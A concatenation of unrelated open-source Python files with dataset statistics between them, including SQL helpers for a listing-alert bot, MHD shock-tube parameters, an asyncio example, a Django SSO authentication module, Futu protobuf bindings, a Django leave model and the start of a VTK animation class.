);
""")
def insert_inbound_msg(conn: TConn, chat_id: int, message: str):
conn.execute("""
INSERT INTO inbound_msg (chat_id, message) VALUES (:chat_id, :message)
""", dict(
chat_id=chat_id,
message=message
))
def insert_contract(conn: TConn, chat_id: int, query: str) -> int:
cur = conn.cursor()
cur.execute("""
INSERT INTO contract (chat_id, query) VALUES (:chat_id, :query)
""", dict(
chat_id=chat_id,
query=query
))
return cur.lastrowid
def insert_listing(conn: TConn, record: Listing) -> bool:
existing_results = conn.execute("""
SELECT listing_id
FROM listing
WHERE contract_id = :contract_id AND ad_id = :ad_id
""", dict(
contract_id=record.contract_id,
ad_id=record.ad_id
)).fetchall()
if existing_results:
return False
conn.execute("""
INSERT INTO listing
(contract_id, ad_id, url, title, description)
VALUES
(:contract_id, :ad_id, :url,:title, :description)
""", dict(
contract_id=record.contract_id,
ad_id=record.ad_id,
url=record.url,
title=record.title,
description=record.description
))
return True
def get_open_contracts(conn: TConn) -> List[Contract]:
results = conn.execute("""
SELECT * FROM contract WHERE is_active = 1;
""").fetchall()
return [Contract(**_) for _ in results]
def get_open_contracts_for_user(conn: TConn, chat_id: int) -> List[Contract]:
results = conn.execute("""
SELECT *
FROM contract
WHERE is_active = 1
AND chat_id = :chat_id
""", dict(
chat_id=chat_id
)).fetchall()
return [Contract(**_) for _ in results]
def get_unsent_listing_notifications(conn: TConn) -> List[ListingWithChatId]:
results = conn.execute("""
SELECT listing_id, ad_id, chat_id, url, title, description
FROM listing
JOIN contract USING (contract_id)
WHERE must_notify_user = 1
AND contract.is_active = 1
""").fetchall()
return [ListingWithChatId(**_) for _ in results]
def mark_listing_as_sent(conn: TConn, listing_id: int):
return conn.execute("""
UPDATE listing
SET must_notify_user = 0
WHERE listing_id = :listing_id
""", dict(listing_id=listing_id))
def deactivate_contract(conn: TConn, chat_id: str, contract_id: int):
conn.execute("""
UPDATE contract
SET is_active = 0
WHERE contract_id = :contract_id
AND chat_id = :chat_id
""", dict(contract_id=contract_id, chat_id=chat_id))
def mark_contract_active(conn: TConn, contract_id: int):
conn.execute("""
UPDATE listing
SET must_notify_user = 0
WHERE contract_id = :contract_id
""", dict(contract_id=contract_id))
conn.execute("""
UPDATE contract
SET is_active = 1 WHERE contract_id = :contract_id
""", dict(contract_id=contract_id))
| 28.37931
| 92
| 0.584447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,636
| 0.533819
|
c4184af48713ebd40a957015c82bc531d4f8d4b7
| 3,601
|
py
|
Python
|
apps/1d/mhd/shock_tube/this_app_params.py
|
dcseal/finess
|
766e583ae9e84480640c7c3b3c157bf40ab87fe4
|
[
"BSD-3-Clause"
] | null | null | null |
apps/1d/mhd/shock_tube/this_app_params.py
|
dcseal/finess
|
766e583ae9e84480640c7c3b3c157bf40ab87fe4
|
[
"BSD-3-Clause"
] | null | null | null |
apps/1d/mhd/shock_tube/this_app_params.py
|
dcseal/finess
|
766e583ae9e84480640c7c3b3c157bf40ab87fe4
|
[
"BSD-3-Clause"
] | null | null | null |
#section [initial]
def _parameters_accessors_checks():
from finess.params import Parameter, Accessor, Check, \
CheckGreaterEqual, CheckGreaterThan, \
CheckOneOf, EnumParameterType
parameters = []
checks = []
rhol = Parameter(variable_name = "rhol",
section = "initial",
name = "rhol",
type_ = "double")
parameters.append(rhol)
checks.append(CheckGreaterThan(rhol, 0.0))
unl = Parameter(variable_name = "unl",
section = "initial",
name = "unl",
type_ = "double")
parameters.append(unl)
utl = Parameter(variable_name = "utl",
section = "initial",
name = "utl",
type_ = "double")
parameters.append(utl)
u3l = Parameter(variable_name = "u3l",
section = "initial",
name = "u3l",
type_ = "double")
parameters.append(u3l)
pl = Parameter(variable_name = "pl",
section = "initial",
name = "pl",
type_ = "double")
parameters.append(pl)
checks.append(CheckGreaterThan(pl, 0.0))
Bnl = Parameter(variable_name = "Bnl",
section = "initial",
name = "Bnl",
type_ = "double")
parameters.append(Bnl)
Btl = Parameter(variable_name = "Btl",
section = "initial",
name = "Btl",
type_ = "double")
parameters.append(Btl)
B3l = Parameter(variable_name = "B3l",
section = "initial",
name = "B3l",
type_ = "double")
parameters.append(B3l)
rhor = Parameter(variable_name = "rhor",
section = "initial",
name = "rhor",
type_ = "double")
parameters.append(rhor)
checks.append(CheckGreaterThan(rhor, 0.0))
unr = Parameter(variable_name = "unr",
section = "initial",
name = "unr",
type_ = "double")
parameters.append(unr)
utr = Parameter(variable_name = "utr",
section = "initial",
name = "utr",
type_ = "double")
parameters.append(utr)
u3r = Parameter(variable_name = "u3r",
section = "initial",
name = "u3r",
type_ = "double")
parameters.append(u3r)
pr = Parameter(variable_name = "pr",
section = "initial",
name = "pr",
type_ = "double")
parameters.append(pr)
checks.append(CheckGreaterThan(pr, 0.0))
Bnr = Parameter(variable_name = "Bnr",
section = "initial",
name = "Bnr",
type_ = "double")
parameters.append(Bnr)
Btr = Parameter(variable_name = "Btr",
section = "initial",
name = "Btr",
type_ = "double")
parameters.append(Btr)
B3r = Parameter(variable_name = "B3r",
section = "initial",
name = "B3r",
type_ = "double")
parameters.append(B3r)
return parameters, map(Accessor, parameters), checks
parameter_list, accessor_list, check_list = \
_parameters_accessors_checks()
| 31.587719
| 68
| 0.463482
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 450
| 0.124965
|
c418d7e5abef02bb7493320d6cd67da6e01f6114
| 1,142
|
py
|
Python
|
async-functions.py
|
cheezyy/python_scripts
|
9db713ca085c6f1fd5ec63d79762a470093e028a
|
[
"MIT"
] | null | null | null |
async-functions.py
|
cheezyy/python_scripts
|
9db713ca085c6f1fd5ec63d79762a470093e028a
|
[
"MIT"
] | null | null | null |
async-functions.py
|
cheezyy/python_scripts
|
9db713ca085c6f1fd5ec63d79762a470093e028a
|
[
"MIT"
] | null | null | null |
'''
Chad Meadowcroft
Credit to Sentdex (https://pythonprogramming.net/)
'''
import asyncio
async def find_divisibles(inrange, div_by):
# Define division function with async functionality
print("finding nums in range {} divisible by {}".format(inrange, div_by))
located = []
for i in range(inrange):
if i % div_by == 0:
located.append(i)
if i % 50000 == 0:
await asyncio.sleep(0.00001)
print("Done w/ nums in range {} divisible by {}".format(inrange, div_by))
return located
async def main():
# Example functions to run concurrently
divs1 = loop.create_task(find_divisibles(508000, 34113))
divs2 = loop.create_task(find_divisibles(10052, 3210))
divs3 = loop.create_task(find_divisibles(500, 3))
# Activate async operation
await asyncio.wait([divs1, divs2, divs3])
return divs1, divs2, divs3
if __name__ == '__main__':
try:
loop = asyncio.get_event_loop()
loop.set_debug(1)
d1, d2, d3 = loop.run_until_complete(main())
print(d1.result())
except Exception as e:
pass
finally:
loop.close()
| 29.282051
| 77
| 0.645359
| 0
| 0
| 0
| 0
| 0
| 0
| 790
| 0.691769
| 285
| 0.249562
|
c41996b81d3533341a720d569e52c1e49f5c467b
| 1,114
|
py
|
Python
|
setup.py
|
jackaraz/ma5_expert
|
4d359b5110874c2f44f81e10307bd1ea3f9e20d0
|
[
"MIT"
] | 2
|
2021-04-06T08:37:41.000Z
|
2022-01-07T09:15:25.000Z
|
setup.py
|
jackaraz/ma5_expert
|
4d359b5110874c2f44f81e10307bd1ea3f9e20d0
|
[
"MIT"
] | null | null | null |
setup.py
|
jackaraz/ma5_expert
|
4d359b5110874c2f44f81e10307bd1ea3f9e20d0
|
[
"MIT"
] | null | null | null |
from setuptools import setup
import os
with open("README.md", "r", encoding="utf-8") as f:
long_description = f.read()
requirements = []
if os.path.isfile("./requirements.txt"):
with open("requirements.txt", "r") as f:
requirements = f.read()
requirements = [x for x in requirements.split("\n") if x != ""]
setup(
name="ma5_expert",
version="0.0.1",
description=("MadAnalysis 5 interpreter for Expert mode"),
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jackaraz/ma5_expert",
author="Jack Y. Araz",
author_email=("jack.araz@durham.ac.uk"),
license="MIT",
packages=[
"ma5_expert",
"ma5_expert.CutFlow",
"ma5_expert.tools",
],
install_requires=requirements,
python_requires=">=3.6",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Physics",
],
)
| 29.315789
| 67
| 0.630162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 481
| 0.431777
|
c41a92320c98d0d79eebb92f7c12dfc1830b9325
| 4,977
|
py
|
Python
|
apitest/api_test/common/auth.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
apitest/api_test/common/auth.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | 3
|
2020-06-06T01:57:41.000Z
|
2021-06-10T22:57:58.000Z
|
apitest/api_test/common/auth.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework.authentication import BaseAuthentication
from rest_framework import exceptions
from rest_framework.parsers import JSONParser
from django.conf import settings
import requests
from api_test.common import MD5
from api_test.models import ProjectMember
from django.contrib.auth.models import User,Group
from rest_framework.authtoken.models import Token
ssoLogin=settings.SSO_LOGIN
ssoClientId=settings.SSO_CLIENTID
ssoClientSecret=settings.SSO_CLIENTSECRET
ssoRedirectUrl=settings.SSO_REDIRECTURL
ssoNotifyUrl=settings.SSO_NOTIFYURL
ssoGetTicketUrl=settings.SSO_GETTICKETURL
#sso的token的校验地址
ssoValidateUrl=settings.SSO_VALIDATEURL
ssoLoginUrl=settings.SSO_LOGINURL
ssoLogoutUrl=settings.SSO_LOGOUTURL
class Dict(dict):
__setattr__ = dict.__setitem__
__getattr__ = dict.__getitem__
def dict_to_object(dictObj):
if not isinstance(dictObj, dict):
return dictObj
inst=Dict()
for k,v in dictObj.items():
inst[k] = dict_to_object(v)
return inst
class TokenAuthentication(BaseAuthentication):
'''认证类'''
def authenticate(self, request):
ticket = request.META.get('HTTP_AUTHORIZATION')
if ticket:
if ssoLogin:
params={"cmd":"80010002","data":{"ticket":ticket,"client_secret":ssoClientSecret,"secret_key":MD5.encrypt("%s-%s" % (ticket,ssoClientSecret))}}
response=requests.post(url=ssoValidateUrl,json=params).json()
if response["code"]==0:
user_id=response["data"]["identifier"]
expire=response["data"]["expire"]
params={"cmd":"80010004","data":{"user_id":user_id,"client_secret":ssoClientSecret,"secret_key":MD5.encrypt("%s-%s" % (user_id,ssoClientSecret))}}
response=requests.post(url=ssoValidateUrl,json=params).json()
if response["code"]==0:
user=User.objects.get(username=response["data"]["user_name"])
if not user:
response["data"]["pk"]=user_id
user=dict_to_object(response["data"])
return (user,ticket)
else:
raise exceptions.AuthenticationFailed('用户认证失败')
else:
token= Token.objects.get(key=ticket)
if token:
user=User.objects.get(id=token.user.id)
return (user,ticket)
else:
raise exceptions.AuthenticationFailed('用户认证失败')
else:
token= Token.objects.get(key=ticket)
if token:
user=User.objects.get(id=token.user.id)
return (user,ticket)
else:
raise exceptions.AuthenticationFailed('用户认证失败')
else:
secretKey=MD5.encrypt("%s-%s-%s-%s" % (ssoRedirectUrl,ssoNotifyUrl,ssoClientId,ssoClientSecret))
url="%s?redirect_uri=%s¬ify_uri=%s&client_id=%s&secret_key=%s" % (ssoGetTicketUrl,ssoRedirectUrl,ssoNotifyUrl,ssoClientId,secretKey)
requests.get(url=url)
def authenticate_header(self, request):
pass
def permission_required(*permissions):
'''自定义 权限验证 装饰器'''
def wrapper(func):
def check_permission(self,request):
check=True
if len(permissions)>0:
project_id=""
if request.method=="GET":
project_id=request.GET.get("project_id","")
if request.method=="POST":
data = request.data
project_id=data["project_id"] if "project_id" in data else ""
if project_id:
projectMember=ProjectMember.objects.filter(project_id=project_id,user_id=request.user.id)
user=User.objects.get(id=request.user.id)
if len(projectMember)>0:
groupId=projectMember[0].group.id
group=Group.objects.get(id=groupId)
for permission in permissions:
if permission and len(group.permissions.filter(codename=permission))==0:
check=False
break
if not permission and not user.is_superuser:
check=False
break
else:
check=False
else:
user=User.objects.get(id=request.user.id)
if not user:
check=False
elif not user.is_superuser:
check=False
if check:
return func(self,request)
else:
raise exceptions.NotAcceptable('用户没有该权限!')
return check_permission
return wrapper
| 42.905172
| 166
| 0.569821
| 2,369
| 0.46772
| 0
| 0
| 0
| 0
| 0
| 0
| 515
| 0.101678
|
c41b88fc454a463ac7213753efc46174f0522ef0
| 12,745
|
py
|
Python
|
futu/common/pb/Qot_GetPriceReminder_pb2.py
|
Hason-Cheung/py-futu-api
|
caa2f136ee07a2b123c79b2d75bbb524d7873e53
|
[
"Apache-2.0"
] | 858
|
2018-11-12T12:54:56.000Z
|
2022-03-10T17:35:43.000Z
|
futu/common/pb/Qot_GetPriceReminder_pb2.py
|
EricChengg/hongkong-futu-user-investment-report-generater
|
d450260a107f9e053036c31b05b8290b7b22c237
|
[
"Apache-2.0"
] | 113
|
2018-11-12T01:52:31.000Z
|
2022-02-27T03:53:07.000Z
|
futu/common/pb/Qot_GetPriceReminder_pb2.py
|
EricChengg/hongkong-futu-user-investment-report-generater
|
d450260a107f9e053036c31b05b8290b7b22c237
|
[
"Apache-2.0"
] | 201
|
2018-11-19T08:32:45.000Z
|
2022-03-23T06:39:02.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: Qot_GetPriceReminder.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Qot_Common_pb2 as Qot__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Qot_GetPriceReminder.proto',
package='Qot_GetPriceReminder',
syntax='proto2',
serialized_pb=_b('\n\x1aQot_GetPriceReminder.proto\x12\x14Qot_GetPriceReminder\x1a\x0c\x43ommon.proto\x1a\x10Qot_Common.proto\"k\n\x11PriceReminderItem\x12\x0b\n\x03key\x18\x01 \x02(\x03\x12\x0c\n\x04type\x18\x02 \x02(\x05\x12\r\n\x05value\x18\x03 \x02(\x01\x12\x0c\n\x04note\x18\x04 \x02(\t\x12\x0c\n\x04\x66req\x18\x05 \x02(\x05\x12\x10\n\x08isEnable\x18\x06 \x02(\x08\"r\n\rPriceReminder\x12&\n\x08security\x18\x01 \x02(\x0b\x32\x14.Qot_Common.Security\x12\x39\n\x08itemList\x18\x02 \x03(\x0b\x32\'.Qot_GetPriceReminder.PriceReminderItem\"=\n\x03\x43\x32S\x12&\n\x08security\x18\x01 \x01(\x0b\x32\x14.Qot_Common.Security\x12\x0e\n\x06market\x18\x02 \x01(\x05\"E\n\x03S2C\x12>\n\x11priceReminderList\x18\x01 \x03(\x0b\x32#.Qot_GetPriceReminder.PriceReminder\"1\n\x07Request\x12&\n\x03\x63\x32s\x18\x01 \x02(\x0b\x32\x19.Qot_GetPriceReminder.C2S\"j\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12&\n\x03s2c\x18\x04 \x01(\x0b\x32\x19.Qot_GetPriceReminder.S2CBJ\n\x13\x63om.futu.openapi.pbZ3github.com/futuopen/ftapi4go/pb/qotgetpricereminder')
,
dependencies=[Common__pb2.DESCRIPTOR,Qot__Common__pb2.DESCRIPTOR,])
_PRICEREMINDERITEM = _descriptor.Descriptor(
name='PriceReminderItem',
full_name='Qot_GetPriceReminder.PriceReminderItem',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='Qot_GetPriceReminder.PriceReminderItem.key', index=0,
number=1, type=3, cpp_type=2, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='Qot_GetPriceReminder.PriceReminderItem.type', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='Qot_GetPriceReminder.PriceReminderItem.value', index=2,
number=3, type=1, cpp_type=5, label=2,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='note', full_name='Qot_GetPriceReminder.PriceReminderItem.note', index=3,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='freq', full_name='Qot_GetPriceReminder.PriceReminderItem.freq', index=4,
number=5, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isEnable', full_name='Qot_GetPriceReminder.PriceReminderItem.isEnable', index=5,
number=6, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=84,
serialized_end=191,
)
_PRICEREMINDER = _descriptor.Descriptor(
name='PriceReminder',
full_name='Qot_GetPriceReminder.PriceReminder',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetPriceReminder.PriceReminder.security', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='itemList', full_name='Qot_GetPriceReminder.PriceReminder.itemList', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=193,
serialized_end=307,
)
_C2S = _descriptor.Descriptor(
name='C2S',
full_name='Qot_GetPriceReminder.C2S',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetPriceReminder.C2S.security', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='market', full_name='Qot_GetPriceReminder.C2S.market', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=370,
)
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Qot_GetPriceReminder.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='priceReminderList', full_name='Qot_GetPriceReminder.S2C.priceReminderList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=372,
serialized_end=441,
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Qot_GetPriceReminder.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='c2s', full_name='Qot_GetPriceReminder.Request.c2s', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=443,
serialized_end=492,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Qot_GetPriceReminder.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Qot_GetPriceReminder.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Qot_GetPriceReminder.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Qot_GetPriceReminder.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Qot_GetPriceReminder.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=494,
serialized_end=600,
)
_PRICEREMINDER.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_PRICEREMINDER.fields_by_name['itemList'].message_type = _PRICEREMINDERITEM
_C2S.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_S2C.fields_by_name['priceReminderList'].message_type = _PRICEREMINDER
_REQUEST.fields_by_name['c2s'].message_type = _C2S
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['PriceReminderItem'] = _PRICEREMINDERITEM
DESCRIPTOR.message_types_by_name['PriceReminder'] = _PRICEREMINDER
DESCRIPTOR.message_types_by_name['C2S'] = _C2S
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PriceReminderItem = _reflection.GeneratedProtocolMessageType('PriceReminderItem', (_message.Message,), dict(
DESCRIPTOR = _PRICEREMINDERITEM,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.PriceReminderItem)
))
_sym_db.RegisterMessage(PriceReminderItem)
PriceReminder = _reflection.GeneratedProtocolMessageType('PriceReminder', (_message.Message,), dict(
DESCRIPTOR = _PRICEREMINDER,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.PriceReminder)
))
_sym_db.RegisterMessage(PriceReminder)
C2S = _reflection.GeneratedProtocolMessageType('C2S', (_message.Message,), dict(
DESCRIPTOR = _C2S,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.C2S)
))
_sym_db.RegisterMessage(C2S)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.S2C)
))
_sym_db.RegisterMessage(S2C)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.Request)
))
_sym_db.RegisterMessage(Request)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pbZ3github.com/futuopen/ftapi4go/pb/qotgetpricereminder'))
# @@protoc_insertion_point(module_scope)
| 36.83526
| 1,141
| 0.748764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,306
| 0.259396
|
c41bd740e3e0dc24d155a81087255bfae49c7719
| 903
|
py
|
Python
|
leave/models.py
|
shoaibsaikat/Django-Office-Management
|
952aa44c2d3c2f99e91c2ed1aada17ee15fc9eb0
|
[
"Apache-2.0"
] | null | null | null |
leave/models.py
|
shoaibsaikat/Django-Office-Management
|
952aa44c2d3c2f99e91c2ed1aada17ee15fc9eb0
|
[
"Apache-2.0"
] | null | null | null |
leave/models.py
|
shoaibsaikat/Django-Office-Management
|
952aa44c2d3c2f99e91c2ed1aada17ee15fc9eb0
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from django.db.models.deletion import CASCADE
from accounts.models import User
class Leave(models.Model):
title = models.CharField(max_length=255, default='', blank=False)
user = models.ForeignKey(User, on_delete=CASCADE, blank=False, related_name='leaves')
creationDate = models.DateTimeField(auto_now_add=True)
approver = models.ForeignKey(User, on_delete=CASCADE, blank=False, related_name='leave_approvals')
approved = models.BooleanField(default=False, blank=True)
approveDate = models.DateTimeField(default=None, blank=True, null=True)
startDate = models.DateTimeField(default=None, blank=False)
endDate = models.DateTimeField(default=None, blank=False)
dayCount = models.PositiveIntegerField(default=0, blank=False)
comment = models.TextField(default='', blank=False)
def __str__(self):
return super().__str__()
| 45.15
| 102
| 0.75526
| 792
| 0.877076
| 0
| 0
| 0
| 0
| 0
| 0
| 29
| 0.032115
|
c41c16df2e1d607a9a0d2aad44ec758217ef96ce
| 22,021
|
py
|
Python
|
svtk/vtk_animation_timer_callback.py
|
SimLeek/pglsl-neural
|
8daaffded197cf7be4432754bc5941f1bca3239c
|
[
"MIT"
] | 5
|
2018-03-25T23:43:32.000Z
|
2019-05-18T10:35:21.000Z
|
svtk/vtk_animation_timer_callback.py
|
PyGPAI/PyGPNeural
|
8daaffded197cf7be4432754bc5941f1bca3239c
|
[
"MIT"
] | 11
|
2017-12-24T20:03:16.000Z
|
2017-12-26T00:18:34.000Z
|
svtk/vtk_animation_timer_callback.py
|
SimLeek/PyGPNeural
|
8daaffded197cf7be4432754bc5941f1bca3239c
|
[
"MIT"
] | null | null | null |
import time
import numpy as np
import vtk
from vtk.util import numpy_support
from svtk.lib.toolbox.integer import minmax
from svtk.lib.toolbox.idarray import IdArray
from svtk.lib.toolbox.numpy_helpers import normalize
import math as m
class VTKAnimationTimerCallback(object):
"""This class is called every few milliseconds by VTK based on the set frame rate. This allows for animation.
I've added several modification functions, such as adding and deleting lines/points, changing colors, etc."""
__slots__ = ["points", "point_colors", "timer_count", "points_poly",
"lines", "lines_poly", "line_colors", "line_id_array"
"last_velocity_update", "unused_locations",
"last_color_velocity_update", "renderer", "last_bg_color_velocity_update",
"last_velocity_update", "_loop_time", "remaining_lerp_fade_time", "lerp_multiplier",
"line_id_array", "point_id_array", "point_vertices", "interactor_style", "renderer",
"interactive_renderer", "_started"
]
def __init__(self):
self.timer_count = 0
self.last_velocity_update = time.clock()
self.last_color_velocity_update = time.clock()
self.last_bg_color_velocity_update = time.clock()
self._loop_time = time.clock()
self.unused_locations = []
self.remaining_lerp_fade_time = 0
self.lerp_multiplier = 1
self.line_id_array = IdArray()
self.point_id_array = IdArray()
self._started=False
def add_lines(self, lines, line_colors):
"""
Adds multiple lines between any sets of points.
Args:
lines (list, tuple, np.ndarray, np.generic):
An array in the format of [2, point_a, point_b, 2, point_c, point_d, ...]. The two is needed for VTK's
lines.
line_colors (list, tuple, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
lines.
Returns:
list: An array containing the memory locations of each of the newly inserted lines.
"""
assert (isinstance(lines, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(line_colors, (list, tuple, np.ndarray, np.generic)))
np_line_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_line_color_data = numpy_support.vtk_to_numpy(self.line_colors)
#todo: add lines in unused locations if possible
mem_locations = range(int(len(np_line_data) / 3), int((len(np_line_data) + len(lines)) / 3))
np_line_data = np.append(np_line_data, lines)
if len(np_line_color_data) > 0:
np_line_color_data = np.append(np_line_color_data, line_colors, axis=0)
else:
np_line_color_data = line_colors
vtk_line_data = numpy_support.numpy_to_vtkIdTypeArray(np_line_data, deep=True)
self.lines.SetCells(int(len(np_line_data) / 3), vtk_line_data)
vtk_line_color_data = numpy_support.numpy_to_vtk(num_array=np_line_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_line_color_data)
self.lines_poly.Modified()
self.line_id_array.add_ids(mem_locations)
return mem_locations
def del_all_lines(self):
"""
Deletes all lines.
"""
